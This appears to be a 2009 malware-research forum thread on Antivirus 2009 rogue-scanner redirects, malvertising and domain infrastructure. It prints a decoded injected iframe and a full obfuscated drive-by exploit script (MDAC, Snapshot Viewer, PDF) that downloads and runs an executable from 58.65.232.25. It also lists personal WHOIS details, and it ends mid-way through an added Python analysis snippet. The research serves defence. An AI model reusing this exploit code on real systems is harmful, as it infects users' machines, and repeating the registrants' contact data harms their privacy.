ads.adsrefer.net/serve/serveiad?atype=b2&pid=[*]
ads.adsrefer.net/serve/showiad?atype=b2&pid=[*]&cid=[*]&tid=[*]
www.eorsnacx.net/placeholder-1138825-1378737393?atype=b2&pid=[*]
www.awltovhc.com/image-3195015-10439665
www.yceml.net/1009/10439665-2.gif
fc.webmasterpro.de/as_noscript.php?name=[*]
Banner.
yceml.net/1009/10439665-2.gif

IPB Image
eorsnacx.net contains an escaped javascript. Decoded we notice a PDF exploit. Below is a snippet of the code.
IPB Image
<h4>
IP details
</h4>
ads.adsrefer.net / www.eorsnacx.net / srv.svc.ms - 85.17.162.100

Name Server: NS1.DOMAINSERVICE.COM - NS2.DOMAINSERVICE.COM - NS3.DOMAINSERVICE.COM -NS4.DOMAINSERVICE.COM

hostnames sharing ip with a-records

Kimberly
<h4>
Anything goes ...
</h4>
Infected by Antivirus 2009 and seeking assistance or just curious? Google ...
Peek at the links in red boxes, they are leading to another fake online scanner. You will have to kill the IE / FF process to get out of the infernal loop.
IPB Image
Adapting the search will reveal several similar sites.
IPB Image
All the sites you see listed there have search engines on their site, mainly powered by Ultraseek. The CS.html page used does expect a URL; without it, it does not work. I have no idea if these are hacked servers or if CS.html is really used by those engines.
IPB Image
DON'T follow the link
CODE
cpastar2.cpa.state.tx.us/cs.html?url=//halfstyles-1.com/in.php%3Fn%3D30826q=free+antivirus+2009
The CS.html page acts simply as a redirect, the location being the appended URL. You can test it yourself by using a safe site as parameter, e.g. www.microsoft.com
cpastar2.cpa.state.tx.us/cs.html?url=//www.microsoft.com

Complete redirect.
halfstyles-1.com/in.php[*]
4goscan.com/?uid=[*]
new4scan.com/?uid=[*]
halfstyles-1.com - 66.96.130.149

Updated Date: 30-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.IPOWERDNS.COM - NS1.IPOWERWEB.NET
Registrant: Aleks Tleper Valerevich (tlep@mail.ru)

4goscan.com - 78.159.99.52

Updated Date: 27-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Registrant: Aron Jeanene - Email: etilrello@gmail.com

new4scan.com - 78.159.99.52

Updated Date: 27-dec-2008
Registrar: REGTIME LTD
Name Server: NS1.NEW4SCAN.COM - NS1.NEW4SCAN.COM
Registrant: Aron Jeanene - Email: etilrello@gmail.com

Other domains used.

merrytexmas.net - 87.248.163.58
Updated Date: 26-dec-2008

happy2009texmas.com - 87.248.163.58
Updated Date: 01-jan-2009

marker2009.com - 87.248.163.58
Updated Date: 06-jan-2009

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
NS3.MY2NS.NET - NS4.MY2NS.NET
Registrant: PrivacyProtect.org
Kimberly
<h4>
WARNING: Quigley-Simpson being impersonated
</h4>
It has been brought to my attention that malvertizements are being sold using the domain quigley-simpson.net

Upon visiting the site we are redirected to the real Quigley-Simpson - quigleysimpson.com - website as seen below. This ain't the first time that the bad guys are using this trick in order to fool potential buyers.
IPB Image
Let's compare the contact details from both websites. In order to protect privacy details, I will only post a screenshot of the real website contact details. You will notice that both are located on Wilshire Blvd, LA but at a different address and with a different phone number.

Quigley-Simpson - quigleysimpson.com
IPB Image
quigley-simpson.net

Craig Colbert c.colbert@quigley-simpson.net
Quigley-Simpson
6500 Wilshire Blvd, Suite 1100,
Los Angeles, CA 90048
Phone: 213-271-9535
Fax: 323-386-0830

quigley-simpson.net - 94.247.3.17

Updated Date: 17-dec-2008
Creation Date: 17-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Registrant:quigleysimpson
Bagg, Gerald (gbagg@earthlink.net)
Los Angeles, CA 90049-0935
Los Angeles
null,90049-0935
US
Tel. +310.4704753

hostnames sharing ip with a-records

av10antivir.com | hs.3-17.zlkon.lv | livestream-tds.com | thechanell.com

<h4>
Creatives
</h4>
460x60
IPB Image

IPB Image

IPB Image
Campaign.
adclickmate.net/_stat.gif?src=[*]
______________________________

120x600
IPB Image IPB Image
Campaign.
adclickmate.net/_stat.gif?src=[*]
Other malvertizements featuring Hyundai might be proposed by these imposters. Unfortunately I don't have a sample in my possession for the time being.
Kimberly
<h4>
WARNING : Massive redirects from search engines to kagbedorgen.net
</h4>
On Dec 19 2008 and Jan 9 2009 we saw how people got redirected from search results. In the past 24h a high number of weird sites have shown up in Google. They are formatted like this:
d[00-09].vjurr[0-6].[***].pl/[number]

Examples:
d06.vjurr4.osa.pl/*
d07.vjurr4.345.pl/*
d06.vjurr2.orge.pl/*


IPB Image
The above screenshot only reflects results when searching for antivirus 2009 redirect. Focussing on vjurr5 for example shows that a huge amount of keywords will appear again, basically searching about anything will yield those sites popping up.
IPB Image
When clicking on such a link, we notice that the pages will load blogger tools.
IPB Image
d06.vjurr4.osa.pl/0109051718js contains an obfuscated script leading to kagbedorgen.net. That site holds an interesting script which will determine if you will be redirected or not based on the search engine names in your referer header. All d[00-09].vjurr[0-6].[***].pl/[number] websites are redirecting to kagbedorgen.net, well at least the fair amount I did check.
IPB Image
As you may notice I got redirected to Antivirus 2009. On another link I got redirected to www.rivasearch.com, whose Registrar is Directi (why am I not surprised). That "search engine" contains quite some links you'd better not follow.
IPB Image
If you visit those strange sites without the required referer, a blogspot page is displayed. Don't click on any of those links, they all lead to similar d[00-09].vjurr[0-6].[***].pl/[number] websites.
IPB Image
In general, to stay on the safer side either block the referer header or right click a link, copy and paste it into a new tab.

kagbedorgen.net - 84.16.231.215

Registration Service Provided By: RESELLERCLUB
ns1.kagbedorgen.net
ns2.kagbedorgen.net

www.rivasearch.com - 64.27.21.5

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS.RIVASEARCH.COM
Name Server: NS0.RIVASEARCH.COM

d06.vjurr4.osa.pl - 78.159.124.180 / d06.vjurr4.orge.pl - 78.159.124.181

inetnum: 78.159.124.128 - 78.159.124.255
netname: RUSTELEKOM
Kimberly
<h4>
quigley-simpson.net
</h4>
IPB Image


Back on Jan 10 2008, I did post about malvertizements being distributed by quigley-simpson.net impersonating the legitimate Quigley-Simpson - quigleysimpson.com.

Quigley-Simpson has added a warning to their site alerting about the impersonation. As of today, Directi has taken NO steps to suspend quigley-simpson.net. Sandi did discover even more websites on the same IP. - Ref.
Kimberly
<h4>
netservice1.net - softwarforgoodusers.cn - premium-antivirus-scan.com
</h4>
More Antivirus 2009 Redirects
netservice1.net/in.cgi?[*]
softwarforgoodusers.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
premium-antivirus-scan.com/2009/1/en/freescan.php?id=[*]
netservice1.net - 92.48.201.35

Updated Date: 05-jan-2009
Creation Date: 05-jan-2009
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET
Registrar: BIZCN.COM, INC

softwarforgoodusers.cn - 78.47.172.66

Registration Date: 2009-01-13 19:06
Name Server: ns1.europegigabyte.com - ns2.europegigabyte.com - ns3.europegigabyte.com
Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: StevenArny@softwaresolutions.com

premium-antivirus-scan.com - 195.24.78.186

Updated Date: 16-jan-2009
Creation Date: 03-jan-2009
Name Server: NS1.SINGATOURS.COM - NS2.SINGATOURS.COM - NS3.SINGATOURS.COM
Registrar: BIZCN.COM, INC.
Registrant Contact: Aleksei Garmash bestrob@freebbmail.com

______________________________

Just a quick one as you could spend hours on checking all these NS servers ...

91.211.64.47

ns1.europegigabyte.com

hostnames sharing ip with a-records

dns3.systempromns.com | ns1.eguassembly.com | ns1.fastfreetest.cn | ns1.freehostns.com | ns1.managehostdns.com | ns1.singatours.com

domains using this as nameserver under another name


58.65.237.81

ns2.europegigabyte.com | ns2.eguassembly.com

64.86.17.44

ns3.europegigabyte.com

hostnames sharing ip with a-records

dns2.systempromns.com | microsoft.securedwebbrowser.com | ns2.freefastdns.com | ns3.fastfreetest.cn | ns3.freehostns.com | ns3.freeyourdns.com | ns3.managehostdns.com | ns3.singatours.com | securedwebbrowser.com

domains using this as nameserver under another name


78.46.205.70

ns2.singatours.com

hostnames sharing ip with a-records

ns2.fastfreetest.cn | ns2.freehostedns.com | ns2.freehostns.com | ns2.managehostdns.com | static.70.205.46.78.clients.your-server.de

domains using this as nameserver

internetantispywarescan.com | live-antispyware-scanner.com | newsforbestusers.cn | premium-antivirus-scan.com | premiumantivirusscanner.com | singatours.com

domains using this as nameserver under another name

see 91.211.64.47

domains using 91.211.64.47 / 58.65.237.81 / 64.86.17.44 as nameserver

antivirus-scan-your-pc.com | best-antivirus-defense.com | best-antivirus-pro-scanner.com | best-antivirus-protection.com | best-antivirus-scanner.com | bestantivirusdefence.com | bestantivirusdefense.com | bestantivirusquickscan.com | bestantivirusscanner.com | europegigabyte.com | getluckytoday.cn | internetprotectedweb.com | onlinedeliverysystem.cn | opticscomputers.cn | premiumadvancedscan.com | premiumantivirusscan.com | proantiviruspcscan.com | rapidantiviruspcscan.com | rapidantiviruspcscanner.com | securedwebsolutions.com | stylepoweruser.cn | worldgreenpeace.cn

Initial post: 19 January 2009 04:37 PM
Kimberly
<h4>
WARNING: Photobucket
</h4>
WARNING: Photobucket .... How many times have I been writing that already? Well here we go again. A huge number of users started to report redirects to Antivirus 2009 while accessing their albums on photobucket - Ref. I did spot a suspect domain called ads-hyundai.com while accessing my album.

Screenshot in situ.
IPB Image
Banner.
ads-hyundai.com/bdb/Hyundai/sonata_300x250.swf
IPB Image IPB Image IPB Image
Campaign.
ads-hyundai.com/?id=20091151518297
ads-hyundai.com/banners/flash-loader.php?src=http%3A%2F%2Fads-hyundai.com%2Fbdb%2FHyundai%2Fsonata_300x250.swf&w=300&h=250&url=http%3A%2F%2Fwww.hyundaiusa.com%2Fvehicle%2Fsonata%2F%3Fcmpgnid%3Dsonata3234523
ads-hyundai.com/banners/flash.css
ads-hyundai.com/banners/flashdetect.js
ads-hyundai.com/bdb/Hyundai/sonata_300x250.swf
ads-hyundai.com/banners/
I highly suspect that the advertising from the screenshot is the culprit for several reasons:

Creation date of the domain.

ads-hyundai.com - 92.48.118.2
Updated Date: 23-jan-2009
Creation Date: 23-jan-2009
Registrar: ANSWERABLE.COM (I) PVT. LTD.
Whois Server: whois.answerable.com
Name Server: NS1.ADS-HYUNDAI.COM - NS2.ADS-HYUNDAI.COM
RegistrantContact Details: PrivacyProtect.org

Sandi did spot a domain called hyundai-inc.com when I did report the impersonation of Quigley-Simpson and my contact did mention a Hyundai advertisement. This time the domain is called ads-hyundai.com … strange coincidence isn’t it?

The URL is similar to osmedlin.com & prolinar.com - example MySpace incident - being baddomain/?id=2008[*]. It simply starts with 2009 because we are in 2009 now and not 2008 anymore.

I didn’t get the full script unfortunately, but we have learned for a long time that redirects are always based on geo location and time zones, and more recently that you need a correct referrer (which I did have btw). The Flash creative itself, although using an extremely high number of action scripts, *seems* clean at first sight.
IPB Image
Btw, advising people to upgrade their browser software as suggested on the Photobucket forum will NOT prevent these redirects from happening. Scripting is scripting, no matter what browser you use. The only way to prevent this from occurring is to increase your browser security settings for iframes, scripting or simply deny them, and block Flash in case the redirect is triggered from inside those.

Initial post: Jan 25 2009 04:51 PM
Kimberly
<h4>
banners.exitexchange.com
</h4>
banners.exitexchange.com causing havoc on www.curse.com ? - Link
After 8 pages and over a year ... no comment except "hey get out of the matrix."
IPB Image
Kimberly
<h4>
Google cache ...
</h4>
Google cache might protect you sometimes from scripts but not always as we will discover in today’s journey. Google does take snapshots of web pages, it’s an awesome feature when a site is down, it might be an awful experience when a website / forum got hacked …

The current and up to date page has been cleaned up by the board administrators, but upon visiting the cached page of the IPB board - IP.Board 2.3.6 © 2009 IPS, Inc for reference - we got 2 lil’ warnings since the malicious iframe was indexed by Google. The first warning did occur because I don’t have Adobe Reader installed on this test box, the second was PG intercepting 2 additional exploits (see below for details).
IPB Image

IPB Image
A very small piece of script had been injected into the forum.
IPB Image
Once decoded we discover the following iframe:
CODE
<script>window.status='Done';document.write('<iframe name=d1d73c914ab src=\'http://58.65.232.25/counter/?'+Math.round(Math.random()*7722)+'54\' width=594 height=13 style=\'display: none\'></iframe>')</SCRIPT>
So let's bump to 58.65.232.25/counter/ and discover what’s awaiting us. The first screenshot below shows a snippet of the array used in the function at the bottom of the JavaScript on that page. An interesting obfuscation technique we saw emerging a couple of months ago is used in this type of script. You can find more details about this style of obfuscation here.
IPB Image

IPB Image
Links.
58.65.232.25/counter/?[random]
58.65.232.25/counter/getfile.php?f=pdf
58.65.232.25/counter/getexe.php?h=11
58.65.232.25/counter/getexe.php?h=12
58.65.232.25/counter/getfile.php?f=vispdf
Exploits.
  1. PDF Exploit
  2. Office Snapshot Viewer
  3. MDAC
Script writings.
CODE
<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>


CODE
<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<script type='text/javascript'>function errfuck(){
  return true;
}
window.onerror = errfuck;
function dddec(str){
  cto = "C0lwur9Q1UsJxiMRpfVOTdcoISZ3vjnaFG8Kbht7D2PYqBAyNgmL4k5zX6eWEH";
  cfrom = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res = "";
  for (i = 0; i < str.length; i ++ ){
    c = str.charAt(i);
    pos = cto.indexOf(c);
    if (pos !=- 1)res += cfrom.charAt(pos);
    else res += c;
  }
  return res;
}
function goMDAC(){
  d8 = 0;
  var Qy29Nd = document.createElement(dddec("1opldu"));
  Qy29Nd.setAttribute("id", dddec("ZrkEmx"));
  Qy29Nd.setAttribute("classid", dddec("dVJQx:gtE6yXX6-6Xb5-44tH-EW5b-HHyHz7ykEv56"));
  try {
    var LoWMFJ = Qy29Nd.CreateObject(dddec("sx1xo.JuwlsS"), '');
    var d8 = 1;
  }
  catch (e){
  }
  try {
    var PEELt6 = Qy29Nd.CreateObject(dddec("hRlVV.bUUVQdsuQ1I"), '');
    var d8 = 1;
  }
  catch (e){
  }
  if (d8 == 1){
    try {
      var JB7Ebp = Qy29Nd.CreateObject(dddec("SJTSVk.ALq2nnK"), '');
      JB7Ebp.open("GET", "http://58.65.232.25/counter/getexe.php?h=11", false);
      JB7Ebp.send();
      LoWMFJ.type = 1;
      LoWMFJ.open();
      LoWMFJ.Write(JB7Ebp.responseBody);
      Frogxa = "..\\S87ekhV.exe";
      LoWMFJ.SaveToFile(Frogxa, 2);
      eval(dddec("Kvvqu6.hRlVVvTld9ul(7w1MTs);"));
      //return 1;

    }
    catch (e){
    }
  }
}
function goPDF(){
  wnd = window;
  while (wnd.parent != wnd)wnd = wnd.parent;
  wnd.location = "getfile.php?f=vispdf";
}
function goSnap(){
  var sfrom = 'http://58.65.232.25/counter/getexe.php?h=12';
  var fuckavo = "SB";
  var x;
  var fuckavp = "SB";
  var obj;
  var fuckavx = "SB";
  var mycars = new Array();
  var fuckava = "SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if (objlcx){
    setTimeout('window.location = "ldap://"', 3000);
    for (x in mycars){
      obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
      var buf1 = sfrom;
      var fuckavg = "SB";
      var buf2 = mycars[x];
      var fuckavj = "SB";
      obj.Zoom = 0;
      obj.ShowNavigationButtons = false;
      obj.AllowContextMenu = false;
      obj.SnapshotPath = buf1;
      try {
        obj.CompressedPath = buf2;
        obj.PrintSnapshot();
      }
      catch (e){
      }
    }
  }
  var fuckavqgga = "SB";
  var fuckavqggxa = "SBd";
}
setTimeout('goMDAC();', 3500);
setTimeout('goSnap();', 1);
try {
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj){
    obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj){
    document.write(
    "<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
    setTimeout('goPDF();', 5000);
  }
}
catch (e){
  document.write(
  "<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();', 5000);
}
</script>
Special thanks to Moore for tipping me off on this one.
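The two artifacts in this post, the hidden iframe written by document.write and the dddec() character-substitution obfuscation, can be pulled out of a captured page with a short analysis script. The Python below is an added example for this thread and not code from the original post; SAMPLE_HTML is constructed from the snippets quoted above, with the random query suffix replaced by a fixed value and one ordinary ad frame added for contrast.

```python
import re
from html.parser import HTMLParser

# Substitution alphabets copied from the dddec() function in the decoded script.
CTO = "C0lwur9Q1UsJxiMRpfVOTdcoISZ3vjnaFG8Kbht7D2PYqBAyNgmL4k5zX6eWEH"
CFROM = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
_DECODE_TABLE = str.maketrans(CTO, CFROM)

# Constructed sample: the injected counter iframe (random suffix fixed to 123454),
# a normal 300x250 ad frame, and the 1x1 PDF loader frame from the exploit page.
SAMPLE_HTML = (
    "<html><body>"
    "<iframe name=d1d73c914ab src='http://58.65.232.25/counter/?123454' "
    "width=594 height=13 style='display: none'></iframe>"
    '<iframe src="https://example.com/ad" width="300" height="250"></iframe>'
    "<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>"
    "</body></html>"
)


def dddec(s: str) -> str:
    """Port of the script's dddec(): map each CTO char to CFROM, pass others through."""
    return s.translate(_DECODE_TABLE)


def decode_obfuscated_strings(js: str) -> dict:
    """Map every dddec("...") literal found in a script to its cleartext."""
    return {m: dddec(m) for m in re.findall(r'dddec\("([^"]*)"\)', js)}


class _IframeCollector(HTMLParser):
    """Collects the attribute dicts of all <iframe> tags in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _px(value):
    """Leading integer of a width/height attribute, or None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def find_hidden_iframes(html: str, max_px: int = 10) -> list:
    """Return iframes hidden by inline CSS or sized below max_px, with the reason.

    Heuristic only: frames moved off-screen via position/left or hidden by an
    external stylesheet are not caught by this check.
    """
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        reasons = []
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("style hides frame")
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if (w is not None and w <= max_px) or (h is not None and h <= max_px):
            reasons.append(f"tiny size {w}x{h}")
        if reasons:
            hits.append({"src": attrs.get("src", ""), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe -> {hit['src']} ({', '.join(hit['reasons'])})")
    # The first argument handed to createElement in goMDAC() decodes to a plain tag name.
    print(decode_obfuscated_strings('document.createElement(dddec("1opldu"))'))
```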
Kimberly
<h4>
More Antivirus 2009 tricks & scams
</h4>
Wiki pages, something wonderful when they are not edited by the wrong people. An interesting program on sourceforge.net, some handy links to discover its features and supported formats.
IPB Image
Let’s follow RealMedia support for example. Looks bad, doesn't it?
IPB Image
Clicking on any of those links will lead the victim to an obfuscated script at hostinginfive.com or oamm.info
IPB Image
The script bumps us to wovens.info where we stumble on some escaped text.
IPB Image
Decoded:
CODE
<script type ='text/javascript'> try{addlert('welcome!!!');}catch(err){document.write('<sc'+'ript> document.location="http://goscanuser.com/?uid=165" </sc'+'ript>');}; </script>
From there we are thus hitting another online scanner pushing people to download and buy Antivirus 2009. At first sight the page has been edited on 19 January 2009 and the original content is still present on the bottom of the wiki page. Several other pages have been altered in the same way; QuickTime (MOV), OGM, Cue sheet to cite only a few.
IPB Image
Full links.
lienvard.hostinginfive.com/[*].htm
wovens.info/cgi-bin/counter?id=619105&name=&ref=http%3A//mediacoder.sourceforge.net/wiki/index.php/RealMedia
goscanuser.com/?uid=165
fast6scan.com/?uid=165
Network captures from goscanuser.com and fast6scan.com show an interesting point: Via: 1.1 goeasyscan.com:3128 (squid/2.7.STABLE5)

<h4>
IP details
</h4>
free.hostinginfive.com alias *.hostinginfive.com - 208.110.73.35

Domain Name: HOSTINGINFIVE.COM
Registrar: KEY-SYSTEMS GMBH
Whois Server: whois.rrpproxy.net
Name Server: NS3.SHAWNETWORKS.COM - NS4.SHAWNETWORKS.COM
Updated Date: 13-jul-2008
Creation Date: 13-jul-2008

RSP: iDotz.Net - Domain Name Registration Service
owner-contact: P-SHN243
owner-organization: S. Networks
owner-fname: S.
owner-lname: Networks
owner-street: Corliss Ave.
owner-city: Seattle
owner-state: WA
owner-zip: 98103
owner-country: US
owner-phone: 2062550273
owner-fax: 2062550273
owner-email: ebradsha@gmail.com
______________________________

nefuwalt.oamm.info - 209.190.24.3

Domain ID:D20084066-LRMS
Domain Name:OAMM.INFO
Created On:01-Oct-2007 00:39:13 UTC
Last Updated On:01-Oct-2008 22:24:06 UTC
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant ID:GODA-051232321
Registrant Name:Oscar A. Marrero
Registrant Organization:
Registrant Street1:Private
Registrant City:San Juan
Registrant State/Province:PR
Registrant Postal Code:00641
Registrant Country:US
Registrant Phone:+1.7875033881
Registrant Email:marrerooscaralejandro@gmail.com
______________________________

wovens.info - 78.159.118.157

Domain ID:D20978736-LRMS
Domain Name:WOVENS.INFO
Created On:31-Oct-2007 14:52:06 UTC
Last Updated On:27-Dec-2008 20:46:40 UTC
Sponsoring Registrar:Regtime Ltd. (R455-LRMS)
Registrant ID:CO374656-RT
Registrant Name:Daniils Nikiforovs
Registrant Organization:n/a
Registrant Street1:Kalnciema Street 186
Registrant City:Riga
Registrant State/Province:
Registrant Postal Code:1046
Registrant Country:LV
Registrant Phone:+371.27702718
Registrant Email:dophshli@gmail.com
______________________________

goeasyscan.com - 65.55.12.249

Domain Name: GOEASYSCAN.COM
Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 19-jan-2009
Creation Date: 19-jan-2009
Registrant: Luther Tilgham
Email: sedxanza@gmail.com
Organization: Private person
Address: Kungsportsavenyn 6
City: Goteborg
State: Goteborg
ZIP: 41136
Country: SE
Phone: +46.317673400
______________________________

goscanuser.com - 66.101.58.54

Domain Name: GOSCANUSER.COM
Registrar: UK2 GROUP LTD.
Whois Server: whois.hostingservicesinc.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 28-jan-2009
Creation Date: 28-jan-2009
Registrant: N/A
Robert Pettus (pettus.robert@gmail.com)
553 Churchward St
San Diego
California,92114
US
Tel. +619.2857064
______________________________

fast6scan.com - 66.101.58.54

Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 26-jan-2009
Creation Date: 14-jan-2009
Registrant: Alex Kitzmiller
Email: alkitzmiller@gmail.com
Organization: Private person
Address: Zoutelaan 175
City: Knokke-Heist
State: Knokke-Heist
ZIP: 08300
Country: BE
Phone: +32.50611614
Kimberly
<h4>
WARNING: smartadserver.net / www.smartadserver.net
</h4>
All content from smartadserver.net / www.smartadserver.net, which are trying to impersonate the real SMART AdServer located at www.smartadserver.com, should be rejected.
Who is smartadserver.net / www.smartadserver.net?
IPB Image

IPB Image
Pretty clear, no? adserver.adtechie.net aka adserver.adtechde.net

References.
  1. The New Republic - Sell Your Home
  2. Sell Your Home
  3. www.startribune.com - ETRADE
  4. adtechie.net : SUSPENDED
  5. More adserver.adtechie.net malvertizements
  6. foxnews.com - imin.com
smartadserver.net - 124.217.252.104

Updated Date: 05-dec-2008
Creation Date: 18-nov-2008
Name Server: NS1.SMARTADSERVER.NET - NS2.SMARTADSERVER.NET
Registrar: INTERNET.BS CORP.
Registrant
Private Whois Service
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o smartadserver.net
N4892 Nassau
Bahamas

Administrative Contact
Private Whois Service
Private Whois Service a1kr590496e7fcab0d7c@ixbmmtt496e7cb584ddb.privatewhois.net
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o smartadserver.net
N4892 Nassau
Bahamas
Tel: +1.23456789
Kimberly
<h4>
othersideofmoon.cn - antimalware-scanner.com
</h4>
Current Antivirus 2009 / 2010 / 360 Redirects
othersideofmoon.cn/soft.php?aid=[*]&d=1&refer=[*]
antimalware-scanner.com/promo/1/freescan.php?nu=[*]
othersideofmoon.cn - 83.133.126.201

Registration Date: 2009-01-23 18:50
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Sponsoring Registrar: 广东时代互联科技有限公司 (Guangdong Times Internet Technology Co., Ltd.)
Registrant Organization: null
Administrative Email: matzig@thaitrails.org

antimalware-scanner.com - 195.24.78.186

Updated Date: 31-jan-2009
Creation Date: 29-jan-2009
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Registrar: TODAYNIC.COM, INC.

Registrant: Moody J Arten
Address: 15 17 Avenue dOstende
City: Monaco
Province/state: NA
Country: MC
Postal Code: 02886
Phone: +3.7793156340
Fax: +3.7793156340
Email: info@monacofactoryprom.com
Kimberly
<h4>
clicksovernetwork.cn - antimalware-scanner.com
</h4>
Current Antivirus 2009 / 2010 / 360 Redirects
netservice1.net/redirect/
clicksovernetwork.cn/soft.php?aid=[*]&d=1&refer=[*]
antimalware-scanner.com/promo/1/freescan.php?nu=[*]
clicksovernetwork.cn - 83.133.126.201

Registration Date: 2009-01-23 18:51
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Sponsoring Registrar: 广东时代互联科技有限公司 (Guangdong Times Internet Technology Co., Ltd.)
Registrant Organization: null
Administrative Email: matzig@thaitrails.org
Kimberly
<h4>
whereismat.cn - fast-antimalware-scanner.com
</h4>
Current Antivirus 2009 / 2010 / 360 Redirects
whereismat.cn/soft.php?aid=[*]&d=1&refer=[*]
fast-antimalware-scanner.com/promo/1/freescan.php?nu=[*]&back=[*]
whereismat.cn - 83.133.126.201

hostnames sharing ip with a-records

allsoftwarepayments.com | bestchoicenow.cn | clickseverywhere.cn | clicksovernetwork.cn | clickstransfere.cn | fiatallroad.cn | footbalmanagerlive.cn | hqintegrationsystem.cn | internetknowledge.cn | internetsite2009.cn | livespaceinvaders2009.cn | mylittlebigadventureworld.cn | myspaceawards.cn | neverthelessmind.cn | othersideofmoon.cn | pleaseclickhere.cn | premiuminterestscompany.cn | privateinterfacesystem.cn | privateupdatesystem.com | protectedsecurityaudit.cn | securedosupdates.cn | spaceindustrial.cn | tokyoairlinesonline.cn | wwwbestsitesforyou.cn | yourperfectinternetweb.cn

other names of the nameservers

bestantcomputerprotection.com | dns2.systempromns.com | dns3.systempromns.com | ns1.airflysupport.com | ns1.eguassembly.com | ns1.europegigabyte.com | ns1.fastfreetest.cn | ns1.freehostns.com | ns1.managehostdns.com | ns1.prosecuritysoftware.com | ns1.sherpacompany.com | ns1.singatours.com | ns1.skycomputingonline.com | ns2.freefastdns.com | ns2.skycomputingonline.com | ns2.voguebestchoice.com | ns3.airflysupport.com | ns3.eguassembly.com | ns3.europegigabyte.com | ns3.fastfreetest.cn | ns3.freehostns.com | ns3.freeyourdns.com | ns3.managehostdns.com | ns3.prosecuritysoftware.com | ns3.sherpacompany.com | ns3.singatours.com | ns3.skycomputingonline.com

domains sharing nameservers under another name

antivirus360-protection.com | eosads.com | internetsecuredpayments.com | liveantiviruspccheck.com | onlineantivirus-scanner.com | onlinetds.info | powerantivirusscan.com | premiumantivirusscanner.com | proantivirusscanner.com | protection-fast-scanner.com | protecton-anti-virus-scan.com | protecton-antivirus-scan.com | safeinternetzone.com | secured-antivirus-scanner.com | securedantivirusscanner.com | securedupdatesoftware.com | securedupdatetransfer.com | secureupdateserver.com | support-security-solutions.com | supportsecuritysolutions.com | tdsdefence.info | trafficconverter2.biz | trustedpurchasing.com

fast-antimalware-scanner.com - 194.165.4.7 / 209.160.20.117

Domain Name: FAST-ANTIMALWARE-SCANNER.COM
Registrar: TODAYNIC.COM, INC.
Name Server: NS1.BASICSTECHNOLOGY.COM - NS2.BASICSTECHNOLOGY.COM - NS3.BASICSTECHNOLOGY.COM
Updated Date: 06-mar-2009
Creation Date: 03-mar-2009
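The three lists in the post above (hostnames sharing the A record's IP, other names of the nameservers, domains delegated to those nameservers under another name) are a passive-DNS pivot. The Python below, an added example and not code from the post, reproduces that pivot over a small set of constructed observations: the .cn/.com names are reused from the lists above, but the IP addresses are documentation-range placeholders and the delegations are invented for the example.

```python
from collections import defaultdict

# Constructed passive-DNS style observations (hostname -> set of A records).
# Names come from the post; IPs (203.0.113.x / 198.51.100.x) are placeholders.
A_RECORDS = {
    "whereismat.cn": {"203.0.113.201"},
    "othersideofmoon.cn": {"203.0.113.201"},
    "clicksovernetwork.cn": {"203.0.113.201"},
    "unrelated.example": {"198.51.100.7"},
    "ns1.airflysupport.com": {"203.0.113.10"},
    "ns3.airflysupport.com": {"203.0.113.12"},
    "ns1.freehostns.com": {"203.0.113.10"},    # same box as ns1.airflysupport.com
    "ns3.freeyourdns.com": {"203.0.113.12"},   # same box as ns3.airflysupport.com
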